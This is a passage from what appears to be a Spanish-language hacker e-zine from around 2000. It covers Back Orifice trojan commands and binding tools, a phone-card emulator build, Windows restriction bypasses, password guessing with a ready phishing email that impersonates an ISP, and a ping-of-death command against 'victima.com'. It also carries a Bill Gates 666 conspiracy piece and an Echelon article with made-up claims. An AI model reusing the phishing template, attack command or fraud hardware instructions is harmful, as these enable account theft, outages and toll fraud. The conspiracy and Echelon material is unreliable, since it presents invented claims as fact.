redirlist Listado de puertos de rediccionamiento activos
regmakekey Crea una entrada en el registro
regdelkey Borra una entrada en el registro.
regdelval Borra un valor del registro.
reglistkeys Listado sub llaves de una llave del registro
reglistvals Listado de los valores de una llave del registro
regsetval establece el valor de una llave del registro
resolve resuelve la direccion ip del server
dialog Crea un cuadro de dialogo con el texto que quieras y el
boton ok
info Da la informacion completa del server
lockup cierra el server
passes Muestra las contrase¤as del usuario actual y la
del salvapantallas. Pueden contener basura al final.
reboot Apaga el server y lo reinicia.
tcprecv Conecta el server a una ip concreta y guarda la data
recivida de esa conexion al archivo especificado.
tcpsend conecta el server a una ip, manda el contenido del archivo
especificado y cierra la conexion
Protecciones contra el BO
Algunas versiones de BO estan modificadas para no ser detectadas por
Norton y otros programas. Una manera de detectar BO es buscar la cadena
"bofilemapping". Otra es hacer "command /k /netstat -n" y ver si hay
algun puerto funcionando en 3000 y pico. Por defecto BO usa el 31377.
Tambien hay que controlar en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
y buscar anomalias como windll.dll, la libreria que BO usa por defecto
para cargarse en el sistema.
Por supuesto puede tener otro nombre y estar acompa¤ada de comentarios
falsos "Key file for Windows System Tray, do not delete", etc.
BO no puede acceder a directorios cuyo nombre contenga un alt+255, este
puede ser un buen lugar para instalar el antivirus.
PROTECCION GRATUITAS CONTRA BO:
En www.bardon.com\boelimdl.htm tienen "Back Orifice Eliminator 1.02" que lo
elimina.
Symantec Norton Antivirus tambien es efectivo contra BO, pero no es gratis.
- Utilitarios para el BO
* "SpeakEasy" Abre un canal IRC BO_OWNED donde se muestra informacion
sobre la IP de la victima
* "SaranWrap" Pega BO a cualquier otro programa.
* "SilkRope" Idem SaranWrap pero con encriptacion de 8 bits.
* "ButtTrumpet" Manda eamail a una direccion predeterminada con la
IP de la victima.
* Programas que desactivan las protecciones contra BO.
Esto fue todo, cualquier duda o sugerencia a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
8.RINCON DE LA ELECTRONICA
Tarjetas Telefonicas
INTRODUCCION
Una tarjeta telefonica esta compuesta por una memoria tipo prom de
acceso serie. Esta memoria es un conjunto de fusibles, los cuales se
queman o se dejan intactos para hacer los '1' o '0' logicos. Una vez que un
fusible es quemado, no puede volver a restaurarse.
Cuando uno ingresa una tarjeta se realiza una serie de chequeos para
validarla, y cuenta cuantos fusibles quedan sin quemar del total. En
cada paso se quema uno. Como una vez que un fusible es quemado NO se
puede volver a restaurar, es IMPOSIBLE recargar la tarjeta.
Las caracterisricas de esta memoria serian:
Memoria programable una vez PROM de 256 Bits con Fusible de Bloqueo.
* Organizacion de 256 Bits x 1
* 96 Bits Protegidos del Modo escritura por Fusible de Bloqueo.
* Tension de alimentacion Vcc = 5 V y Tension de Programacion Vpp = 21 V.
* 85 mW de consumo en modo Lectura.
* Inicializado en el encendido (Reset).
***
ÚÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄ¿
1³ Vcc À¿ ÚÙ Gnd ³5
³ À¿ ÚÄÙ ³
ÀÄÄÄÄÄÄÄÄÄ¿ ³ ÚÙ ÚÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄ¿ ÀÄÙ ³ ÚÙÚÄÄÄÄÄÄÄ¿
2³ R\W À¿ÚÄÄÄÙ ³ÚÙ Vpp ³6
ÀÄÄÄÄÄÄÄÄÙ³ ³ÀÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄ¿³ ³ÚÄÄÄÄÄÄÄÄ¿
3³ CK ÚÙÀÄÄÄÄÄÙÀ¿ I\O ³7
ÀÄÄÄÄÄÄÄÙ ÚÄ¿ ÚÄ¿ ÀÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÙ ³ ³ ÀÄÄÄÄÄÄÄÄÄ¿
4³ Reset ÚÙ À¿ Fuse ³8
³ ÚÙ À¿ ³
ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ
Vcc : Provee la alimentacion positiva de la tarjeta, 5 V +- 5%
Gnd : Es la masa de la tarjeta
Vpp : Para leer un fusible se pone a 5V (Vcc), para
quemarlos se pone a 21 V.
Reset : Esta pata, funciona a nivel bajo, y con un 0 resetea un
contador interno que sirve para acceder a la tarjeta.
I/O : por esta pata entran o salen los datos, segun se lea o se
grabe la tarjeta.
R/W : Poniendo esta pata a Gnd, se le indica a la tarjeta que se
quiere leer el bit apuntado por el contador, con Vcc se le
indica que se quiere grabar.
Fuse : Esta pata no tiene importancia para el usuario, ya que se usa
en la frabricacion y programacion de la tarjeta.
El siguiente es un diagrama esquematico del circuito de la tarjeta:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ ÚÄÄ¿ ³
³ ³CKÃÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³
³ ÀÄÄÙ ³ ³
³ ÚÄÄÄ¿ ÚÄÄÄÄÄÄÁÄÄÄÄÄÄ¿ ResetÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³
³ ³R/WÃÄÄÄÄ>³ ÃÄÄÄÄÄ>³ ³ ³
³ ÀÄÄÄÙ ³ ³ ³CONTADOR 8 BITS³ ³
³ ÚÄÄÄÄÄ¿ ³DECODIFICADOR³ Inc ³ ³ ³
³ ³ResetÃÄÄ>³ ÃÄÄÄÄÄ>³ ³ ³
³ ÀÄÄÄÄÄÙ ÀÄÂÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÂÄÄÄÄÄÂÄÄÄÄÄÄÄÙ ³
³ E³ 4 BITS ³ ³4 BITS ³
³ s³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³
³ c³ ³ ÚÄÄÄ¿ ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄ¿ ÚÄÄÄ¿ ³
³ r³ ³ ³ ³ ³ DEC. Y ³ ³ ³ ³
³ i³ ³ ³ ³ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÙ ³ ³ ³
³ t³ ³ ³ ³ ³16 BITS ³ ³ ³
³ u³ ³ ³ D ³ ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄ¿ ³ ³ ³
³ r³ ³ ³ E ³ ³ Addr Y ³ ³ D ³ ³
³ a³ ³ ³ C ³ ³A ³ ³ R ³ ³
³ ³ ³ ³ . ³16 B³d ³ ³ I ³ ³
³ ³ ÀÄ>³ ÃÄÄÄ>³d MEMORIA ÃÄÄÄ>³ V ³ ³
³ ³ ³ X ³ ³r PROM ³ ³ E ³ ³
³ ³ ³ ³ ³ ³ ³ R ³ ³
³ ³ ³ ³ ³X R/W Vpp ³ ³ ³ ³
³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ ³
³ ³ ³ ³ ^ ^ ³ ³ ³
³ ³ ³ ³ ÚÄÄÄÁÄÄÄÄÄÁÄÄÄÄ¿ ³ ³ ³
³ ÚÄÄÄÄ¿ ³ ÀÄÄÄÙ ³ DRIVER DE ³ ÀÄÂÄÙ ³
³ ³FuseÃÄÄ¿ ³ ³ ESCRITURA ³ ³ ÚÄÄÄ¿ ³
³ ÀÄÄÄÄÙ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄ>³I/O³ ³
³ ÚÄÁÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ^ ^ ÀÄÄÄÙ ³
³ ³Logica de Proteccion³ ³ ³ ÚÄÄÄ¿ ³
³ ³de escritura. ÃÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´Vpp³ ³
³ ³(compuerta tipo AND)³ ÀÄÄÄÙ ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
De manera menos teorica seria:
ÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄoÄÄÄÄÄÄÄoÄÄÄÄÄÄÄÄÄÄ¿ ³
³ Reset Enable ³ ³
³ ³ ³
ÄÄÄÄÄÄÄo>Ck ³ ³
³ ³ ³
ÀÄÄÄÄÄÄÄÂÄÂÄÂÄÂÄÂÄÂÄÂÄÂÄÙ ³
ÄÄÄÄÄÄ Vcc ³ ³ ³ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ ³ ³ ³
ÄÄÄÄÄÄ Gnd ³ ³ ³ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ ³ ³ ³
ÚÄÄÄÄÄÄÄÁÄÁÄÁÄÁÄÁÄÁÄÁÄÁÄ¿ ³
ÄÄÄÄÄÄÄ´Vpp ³ ³
³ ³ ³
ÄÄÄÄÄÄÄ´I\O _ ³ ³
³ R/W ³ ³
ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³
³ ³
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Si reseteas (reset=0) el contador interno se pone a 0, y el puntero de
la memoria se situa en la posicion 0. Cada pulso de CLK incrementar el
puntero de la memoria en una posicion. Si estando la memoria apuntando a
un bit determinado la patilla R/W est a 0 (a nivel bajo), entonces en
I/O leeremos los bits que contiene la tarjeta. Si est a 1 podremos meter
por esa patilla los datos a grabar.
Si tenemos el R/W=1 los pulsos del reloj NO incrementan el contador.
Si estoy en el bit 13, paso a escritura, doy un pulso de reloj, y
vuelvo a lectura, seguir‚ estando en el bit 13
Los 256 bits de la tarjeta se dividen en dos partes, 96 protegidos y
160 no-protegidos. Los 96 (del 0 al 95) tiene el nr de serie, fabricante,
pais, y datos de la frabicacion en general.
De los 160 no-protegidos 10 son quemados como prueba, asi que solo nos
quedan 150. Si tomamos cada byte como 8 bits el mapa de la tarjeta
seria ‚esta:
byte valor significado
00
01 83h Indica que es una tarjeta de telefonos estandar.
02 FFh :-? :-(
03 FFh :-???? :-((((
04 5Ah,9Eh 5Ah para 25 pulsos, 9Eh para 50.
05 XX Los bytes 5,6, y 7 forman el numero de serie de 24
06 XX bits visible en la parte posterior de la tarjeta.
07 XX
08 00 :-???????? :-((((((((
09 XX Multiplicando este numero por 10 se obtiene la
cantidad de pulsos que contiene la tarjeta.
10 1Eh :-???????????? :''-(
11 XXh Indica el pais de uso.
12 FFh 8 bits probados en la fabrica.
13 C0h 2 bits probados en la fabrica.
14-31 00h Area de datos. Cada bit en 0 corresponde a un pulso
sin usar.
¡Hola hack lectores!
Aqui va la segunda mitad del emulador de tarjetas.
Los circuitos y el programa que va a continuacion son para que tengan una
idea clara de como funcionan las tarjetas, no para que lo usen de
manera fraudulenta. El programa emula una tarjeta AGOTADA para que
no se le de‚ mal uso. Espero que lo sepan interpretar.
TARJETAS TELEFONICAS
Les pongo varios circuitos:
-Placa del microcontrolador.
-Circuito programador.
-Conexion a la PC.
La PROM del microcontrolador es cargada con el programa y con el
mapa de memoria de la tarjeta deseada. En conjunto despues de haberla
grabado queda una tarjeta normal con unos cablecitos a una placa
3x3 cm. Con un poco de maña lo podes realizar en la propia tarjeta.
Los componentes que necesarios son:
Circuito emulador y Host
1 Tarjeta: Telefonica/Telecom u otras
2 Condensadores de 27 pF
1 Microcontrolador MC68HC705K1
1 Cristal 4.43361 Mhz
1 Resistencia de 10 K
1 Zocalo de 8x2
1 Placa experimental de 5x5
1 Conector hembra para cable paralelo 8 contactos
circuito programador
2 Resistencias de 2k2
1 Resistencia de 220 ohm
2 Condensadores de .1 uF
1 Zocalo de 8x2
1,5 mts Cable paralelo 10 hilos multicolor
1 Conector db 25 macho
1 Fuente de 5 V cc
1 Fuente de 16.5 V cc
Hay varios ficheros (hechos por Mattews):
dantelf.s19: contiene el mapa de la tarjeta en formato Motorola S19.
prog05k.exe: soft para programar el micro. Tiene las instrucciones de la
secuencia de encendido de Vpp y de Vcc.
Mirar primero que el micro este virgen, cargar el archivo dantelf,
programar el micro y verificar que ha cargado bien
** Circuitos **
Placa del Microcontrolador:
Contiene al micro ( 705k1 ), el cristal, los condensadores y una
resistencia para el reset. Montarlo todo como en la GIF, dejando el
micro para el final. Lo mejor es que uses un zocalo.
Programador:
Este circuito es el que se enchufa a la salida LPT para programar el
microcontrolador.
En la placa del programador se empieza por soldar el zocalo, luego
las 3 resistencias y por ultimo el cable paralelo.
En la otra punta del cable se suelda el conector db 25 macho (el de la
impresora). Revisar que cada pin del conector vaya a la
patilla correcta del micro.
Conectar por ultimo las dos fuentes , recordando que AMBAS deben tener
llave de encendido INDEPENDIENTE.
Host:
Aqui viene lo mas jodido del asunto. Para armar el host (o sea, la
tarjeta que vamos a meter en el telefono) es altamente recomendable
tener un soldador de POCA potencia, de 15W esta bien.
Si tenes uno de 30W (que es lo mas normal) le pones un diodo
1N4007 en serie con uno de los cables de alimentacion y listo. Si es de
mas de 30W laburar con mucho cuidado.
Primero hay que calentar la chapita que corresponde al terminal de
I/O de la tarjeta (ver el dibujo de la primera parte) hasta
que se despegue; para despues volverla a pegar en el mismo lugar
calentandola otra vez. Con esto logramos que se corte la conexion que
hay entre el contacto y el chip propiamente dicho.
Tener cuidado de que al pegar la chapita no se toque con ninguna de las que
estan a los costados.
Ahora hay que soldar desde cada contacto un cablecito (el mas fino que
tengas, los hay tipo pelo) a un conector colocado en el extremo de la
tarjeta.
Conviene mandar cuatro cables por arriba, y cuatro por abajo rodeando
la tarjeta, lo mas directo posible, tapando y aislandolos con cinta aisladora.
En el extremo de la tarjeta se pegan 4 pines del lado de arriba y 4
del lado de abajo para formar el conector macho el cual se insertar en el
conector hembra del cable paralelo.
Por ultimo hay que soldar cada cable a un pin del conector, con lo que el
host quedara listo para comunicar el telefono con el mundo exterior.
** Funcionamiento **
El funcionamiento es muy simple. Dentro del micro hay un mapa de la
tarjeta intacto. Cada vez que llega un pulso de reloj del telefono
se activa una interrupcion en el micro. Ah¡ se fija el estado
de los contactos de Reset y de R/W (lectura y escritura), conectados al port del micro.
Y emulamos el funcionamiento de la tarjeta. Si hay que resetear, se
apunta una variable al inicio del mapa de la tarjeta. Si hay que leer se
saca de a uno los bits por uno de los puertos del micro. Si hay que
escribir se setea internamente a 1 ese bit.
Bueno, en realidad la escritura no funcionan asi. Armar la tarjeta,
el probador y mirar como se graba y por que la tarjeta marca agotada.
suerte! Cualquier duda comunicate por e-mail.
Autor: Mattews
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
9.BILL GATES ES EL DIABLO
¨Sabes que el nombre verdadero de Bill Gates es William Henry Gates III?
Hoy en dia se le conoce como Bill Gates (III) donde "III" significa "tercero".
Entonces, que es lo espeluznante de este nombre?
Si tomas todas las letras del nombre Bill Gates III y obtienes el codigo
equivalente en ASCII (American Standard code for information interchange)
de cada una y los sumas todos... obtendras el numero 666, que es el numero
de la bestia !!!
B=66
I=73
L=76
L=76
G=71
A=65
T=84
E=69
S=83
I=1
I=1
I=1
=666 !!! EL NUMERO DEL DIABLO......
¨Coindidencia? quizas, pero toma WINDOWS 95 y haz lo mismo y obtendras
666 tambien !!!
Y lo mismo vale para MS-DOS 6.31 !!!
MS-DOS 77+83+45+68+79+83+32+54+46+50+49=666
WINDOWS 95 87+73+78+68+79+87+83+57+53+1=666
Preparate porque ahora viene lo bueno!!!
Para aquellos tengan el Excel 95 (no el Excel de office 97) prueben esto:
1-Abre un nuevo fichero
2-Posicionate en la fila 95
3-Haz click en el boton con numero 95, asi la linea entera queda seleccionada.
4-Pulsa el tabulador, para moverte a la segunda columna.
5-Ahora, con el raton selecciona en el menuú Ayuda (?) la entrada
"Acerca de Microsoft Excel..."
6-Pulsa las teclas ctrl-alt-shift a la vez y con el raton oprime el boton
"Soporte Tecnico"
7-APARECERA UNA VENTANA, CON TITULO: THE HALL OF TOURTURED SOULS.
Esto es realmente espeluznante, de acuerdo. Es un programa similar al juego
Quake, y se puede recorrer con los cursores. En las paredes aparecen los
nombres en movimiento de las almas torturadas...
8-AHORA DIRIGENTE HACIA LAS ESCALERAS Y DATE LA VUELTA HACIA LA PARED
QUE ESTARIA EN TU ESPALDA AL COMENZAR EL JUEGO. Es blanca y cuadriculada.
Teclea EXCELKFA.
Esto abre la pared y revela otro pasaje secreto. Introducete en el y procura
no caerte del camino elevado (esto es muy dificil!!!), cuando llegues al
final, veras algo realmente espeluznante...
Hasta este punto, los innumerables testigos en todo el mundo han verificado
que esto es una verdadera revelacion que te abre los ojos. Podria ser una
broma de los programadores de Microsoft.
No seria sorprendente que Bill Gates fuera "El anticristo", despues de todo
ya lo dice en la Biblia que alguien poderoso vendra, y guiara al mundo a la
destruccion.
Y Bill Gates sin lugar a dudas tiene ese tipo de poder en sus manos.
Mas el 80% de los ordenadores del mundo tienen Windows y DOS (Incluidos los
del Pentagono!) si todos esos productos tienen algun tipo de peque¤o programa
(como este de "hall of tortured Souls") esto puede darle el control de
configurar los arsenales nucleares, haciendo estragos en los sistemas de
seguridad, y en los sistemas financieros del mundo, etc...
Todo esto se puede hacer desde su sede y no esta lejos de la realidad!
Solo usando Internet Explorer Podemos permitirle espiar lo que tenemos en el
ordenador bit a bit cada vez que nos conectamos.
Quizas el fin del mundo esta cerca y esto es solo la punta del Iceberg!
Cita la Biblia:
"Y el obligo a todos, pequenios y grandes, ricos y pobres, libres y esclavos,
a recibir una marca en su mano derecha o en su frente, de tal modo que nadie
pudo comprar o vender sin la marca, que es el nombre de la bestia o el numero
de su nombre. [...] Este numero es 666
Apocalipsis 13:16-18.
Mira... Es algo sobre lo que debes pensar... Si la Biblia, en el libro del
Apocalipsis dice que sin el signo de la bestia uno no podria ser capaz de
comprar, vender, hacer transacciones comerciales, etc... entonces...
Hay que notar que Internet tambien se conoce como World Wide Web (Tela de
Arania Mundial) o WWW... Otra forma en que podemos escribir W es V/ (VI) asi;
WWW = VI VI VI 666
Esto me da que pensar... ¨No va todo encaminado a introducirse en Internet?
(Por ejemplo: comprar/Vender bienes, transacciones comerciales)
Y no esta Microsoft intentando siempre tener el monopolio de la tecnologia
software que toca, y ahora de Internet?
El Apocalipsis tambien dice que la marca de la bestia se portara en la mano y
en la frente de cada uno... Si Internet fuera en realidad el signo de la
bestia, no estamos empezando a llevarlo en nuestras manos (usando el raton) y
en nuestras frentes (pantalla)?
¨Finalmente, todo encaja o estamos dejandonos llevar por la imaginacion?
Recuerda, el demonio viene a estafar, robar, y destruir... asi que estate
VIGILANTE respecto a Bill Gates de Microsoft.
"Estar o no estar de acuerdo con la WWW o la Bestia", esa no es la cuestion.
Y si WWW es el 666? O ¨Bill Gates es la Bestia?
¨Que haras? ¨Cancelar tu subscripcion a Internet? ¨Renegar de Microsoft?
¨Organizar una campania contra Bill Gates en Internet?
¨Desconectar todos los Windows para siempre?
Eso no te haria ningun bien... Piensa en ello y reza, reza en serio, o bien:
Nunca Dejes de Creer... The trurh is out there...
10.DEFECTOS EN WINDOWS
Pasare a explicar algunos de los tantos defectos que posee este ¨sistema
operativo?. Pero recuerda esto es de lo muy basico:
Windows es un sistema operativo entre comillas que intenta de ser seguro
ante cuelgues, pero no es asi ya que apretando las teclas CTRL+ALT+SUPR
cerramos cualquier programa que tengamos abierto y su funconamiento no
sea el correcto, incluyendo las contrase¤as de inicio en win 95.
Este ¨sistema operativo? se efectua plenamente sobre el D.O.S que desde ya
tampoco es de lo mas seguro o no te diste cuenta cuando siempre en alguna
universidad u otros lugares te impiden el acceso a Guindoze tanto como al
dos. Pero una manera de vencer esto es yendo a la ventana del explorador y
poner command.com, si el explorer no es disponible pues intenta abrir con
el wordpad o algun editor de texto (no el block de notas) el command.com
y guardalo nuevamente como "winhlp32.exe" entonces cada vez que teclees
F1 te aparecera una ventana del DOS para ti solo.
En el caso de windoze 95 las primeras versiones,cuando apagas la pc que
aparece ahora puede apagar el equipo,pon cls y nos deja una pantalla del
dos sisponible.
Otro de los tantos errores en windows es que puedes tu modificar los
logos estupidos que aparecen cuando prendes el ordenador.
Estos estan en la carpeta Windows como :
logo.sys
logows.sys
logos.sys
Las demas modificaciones hazlas tu, pero recuerdan que algunos errores
fueron modificados en alguna version Plus.
Estos defectos son para abrirles los ojos a las personas de lo que es windows
y no se deje enga¤ar por el diablo (bill gates)
Autor:MoRfEO
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Web:www.dighack.cjb.net
11.ACTUALIDAD EN EL UNDERGROUND
Noticias en la red: 15/05/2000 - Informe I
Sin duda la noticia que sacudio la red esta semana fue el gusano ILOVEYOU
que afecto una cifra muy alta de ordenadores de todo el mundo como los de la
C.I.A , el pentagono,el F.B.I y otros ordenadores de alta importancia.
Luego de la aparicion de este han surgido un gran numero de variantes
basandose en su codigo fuente.
Nueva reportera virtual, se llama Ananova y puede expresar emociones a traves
de sus gestos. Se utilizo un nuevo lenguaje de programacion.
Este proyecto costo 400 millones de dolares y podes verla en:
www.ananova.com
12.MORAL DE UN HACKER
1 - ¨Porque ser Hacker?
2 - ¨Como aprendo el Hacking?
Este tipo de preguntas invaden tu Cabeza .
ANALIZEMOS LAS PREGUNTAS FORMULADAS ...
1 - Hey, eso no te lo podria decir yo, debes sacar de tu cabeza esa
respuesta si quieres saber la verdad.
Un Hacker se caracteriza por penetrar en sistemas sin hacer da¤o o modificar
algo en estos. Nos identificamos por tener un nivel insaciable en nuestras
mentes, nos apasiona la computacion, tenemos un derecho de Obligacion a
aprender mas y cada dia mas. Algunos nos catalogan como "Tecno terroristas"
(analizalo) otros como " INTELECTUALES " informaticos.
Si tu sientes una pasion frente a una PC pues dedicate a aprender y a no
fanfarronear. Nunca digas nunca a la hora de penetrar en algun sistema
siempre buscale la tactica a todo que podras hacer algo, no te des por
vencido y acuerdate eres HACKER!!! .
No necesitas disponer de un ordenador "espectacular" hasta simnplemente lo
podras hacer con un 486 ESO NO ES LO DE IMPORTANCIA la verdad esta en tu mente,
en tu saber.
2 - El hacking se aprende pasando las horas frente a la computador buscando
algun Bug en un programilla, programando, usando LINUX, y leyendo algunos
textos (como este).
No es recomendacion leer textos o revistas estupidas que no traten sobre el
hacking.Ya que algunas revista andan dando tarjetas de creditos al lector,
numeros de famosos, maneras de hacer bombas con quimicos y otras cosas que me
parecen de total inrespetuosidad ajena, y aquellas personas que la realizaron no
merecen poder tener un ordenador para escribir tantas huevonadas.
En tanto si de alguna forma eres hacker tu segundo nombre sera Linux o Unix
(dos famosisimos Systemas Operativos y de los mejores ).
Muchas Gracias por tener la subscripcion a la revista y de aca en adelante
por muchos numeros mas.
Autor : Morfeo
E-mail :
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Web : www.dighack.cjb.net
13.OBETENIENDO CONTRASE¥A
Tipo de contrase¤as
Vamos a pasar a explicar como podremos obtener contrase¤as y explicaremos
un poco sobre estas:
Existen disitintos tipos de contrase¤as:
* Generadas por el usuario (tu, yo, cualquiera).
* Generadas por el sistema en general.
* Generadas al azar por un codigo de acceso.
* Generadas mitad por el usuario y mitad por un codigo.
* Frases
* Formulacion de preguntas y respuestas al instante.
* Generadas por codigos.
Entre el rango de estas 7 opciones tu debes saber cual es la que suministra
el sistema al que quieres penetrar (entre la mas comunes se encuentran
aquellas generadas por el usuario ).
Las cuales son al azar dependen de la programacion del sistema, se obtienen
al instante y pueden llevar cualquier tipo de digitos, letras, puntuacion(Etc).
Otras que tambien son al azar pueden ser sacadas de una lista con palabras
y formulando algo sin sentido (como "as45e1s8")
Aquellas que son mitad azar y mitad usuario varian en frases logicas e ilogicas.
Por ejemplo si yo asigno CASA, el sistema nos agregara digitos o silabas
dificultando un poco las cosas , quedando : "CASAf46i8dw".
Las frases de acceso son las mas complicadas en adivinar y tambien las menos
expuestas (como puede ser: " Nadie nace sabiendo " ).
Las del tipo preguntas y repuestas son cuando el usuario suministra una pre-
gunta y una respuesta y esta queda archivada en el sistema para luego refor-
mularse. Por lo comun se usan poco, y resultan fastidiantes, pero si estas fa-
miliarizado con el usuario podras llegar a adivinar la respuesta de la pregunta
formulada.
Las generadas por codigos habitulmente utilizan un artefacto externo, como
por ejemplo el codigo o el numero de serie que se utilizan contra el software
ilegal.
Podemos utilizar distintos metodos para la obtencion de contrase¤as:
- Ingenieria Social y social inversa (descripta en este numero).
- Investigando mas alla de la logica.
- Via I.R.C
- Estudio del sistema.
- Uso de programas.
- Por medio de un bug.
Cabe aclarar el metodo de Ingenieria Social y social inversa ya viene
aclarada en este numero por lo tanto no seran explicados.
*Investigando mas alla de la logica consiste en investigar a una persona
y sus interes. Es decir averiguar fechas, acontecimientos y demas datos cuya
razon sean personales.
Como ocurre en la mayoria de los casos a un usuario comun se le ocurriria
poner un Login y una contrase¤a con su fecha de cumple¤os o la de algun
familiar cercano, ya que no se da cuenta del riesgo que esto provoca.
INGRESE CONTRASE¥A: Aqui al usuario se le ocurriria poner su fecha de
casado, o lo primero que se le ocurra (ej. si es tecnico electronico podria ser
algo relacionado con lo que estudia, o algo que le surge de la nada).
Como mencione arriba puedes realizar algo de Ingenieria Social: (explicado a
fondo en esta edicion).
De: Ciudad Internet Service Provider
Para:XXXXXXXXXXXXXXX (Cualquiera)
Asunto: IMPORTANTE
Estimado Usuario de Ciudad Internet debido a graves problemas
en nuestro sistema debe enviarnos su Log-In y Contrase¤a dentro de un rango
de las 48Hs posibles.
De no ser asi su cuenta podria ser DADA DE BAJA.
Muchas Gracias.
Ciudad Internet Service Provider.
Sepa Disculpar Nuestras Molestias.
Cabe de aclarar que el usuario que reciba esto debe ser muy nulo en cuanto al
comprendimiento de computacion de no ser no funcionara de nada esto que iremos
a realizar.
Si es el caso de un e-mail podriamos mandarlo anonimamente y poner de remitente
---
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
---
Bueno en el proximo numero les explicare mas a fondo y mas tecnicamente los
metodos ya explicados y las muchas cosas que faltan.
Autor: MoRfEo
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
14.ECHELON NOS VIGILA
Todos se preguntaran a que nos referimos con ECHELON, diran que es un mensaje
apelativo, pero no es de nigun modo asi.
En verdad ECHELON es la super red de espionaje existente hasta la actualidad.
pero ... ¨ Porque ? : Se encarga de leer y escuchar todo lo que circula por
internet.
Estados Unidos, Australia, Canada, Nueva Zelanda y Gran Breta¤a son los due¤os
de ECHELON.
Francis Drake, el pirata, dijo que esa red se monto para salvaguardar el
bienestar economico nacional y para prevenir y detectar crimenes graves.
Tanto el papa Juan Pablo II y la madre Teresa integran la lista de las
personalidades espiadas.
ECHELON es un conjunto de "ciento veinte satelites con radares" que giran
alrededor del planeta y no desda¤an nada de lo que encuentran a su paso.
A Inglaterra por ejemplo se dice que cuanto a e-mail contiene las
palabras "FalkLand" o "Malvinas" es interceptado y enviado a Foreing Office.
De tal modo que si le envias algo a alguna persona de apellido Malvina es
interceptado por los malditos ingleses y hasta leido.
Hemos llegado a un punto donde nada en el Ciberespacio es privado .
Ya se han ido las ilusiones de de crear una red neutral y libre donde los
due¤os seamos "nosotros" con nuestra cultura de siempre...
Fecha:13/05/00
Autor:Morfeo
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Web:www.dighack.cjb.net
15.PING DE LA MUERTE By technohackers
A continuacion te daremos un ping que hara estragos:
Esta t‚cnica no es propia de un Hacker sino de un Lamer
(no quiero decir Cracker para no ofender a nadie :) ya que £nicamente sirve
para tirar un servidor o sea que se desconecta de Internet y esto puede
representar grandes perdidas a una empresa. Con esto solo les quiero decir
que aunque aqu¡ les explicare no es cuesti¢n que lo uses por Internet
atacando servidores.
La utilidad Ping sirve principalmente para saber si un servidor esta
activo y adem s podemos calcular el trafico en la red seg£n el tiempo de su
respuesta. B sicamente se le env¡a un paquete a un servidor y este nos
contesta, solo que si se le env¡a un paquete muy grande puede llegar
desordenado, por lo que el servidor pide al origen que le vuelva a
enviar una parte o la totalidad del paquete, por lo que se produce un
datagrama del ping muy grande y producir su ca¡da. Para ejecutar este ataque
solo tenemos que escribir :
c:\>ping -l 65510 victima.com
Pues esta simple l¡nea es muy destructiva, por lo que tened cuidado y antes de
hacer tonter¡as lee la parte sobre seguridad y como borrar sus huellas.
16.LINUX
Por falta de tiempo este articulo no fue terminado, en la proxima edicion
explicaremos a fondo la instalacion y en ediciones proximas nos meteremos
mas a fondo en este sistema operativo.
Los dejamos con algunos links que visiten y mientras vayan buscando
imformacion sobre este:
www.linux.com ---------------> Variado
www.linuxgames.com ----------> Games para Linux.
www.linux.org ---------------> Linux Online.
www.linux.org.ar ------------> Agrupacion Linux Argentina
www.li.org ------------------> Comunidad Linux
www.kernel.org --------------> Kernels para Linux
www.winlinux.net ------------> winLinux
www.slashdot.org ------------> Noticias de Linux
17.VIRUS
Uno de los objetivos a prioritarios de los virus es pasar desapercibido
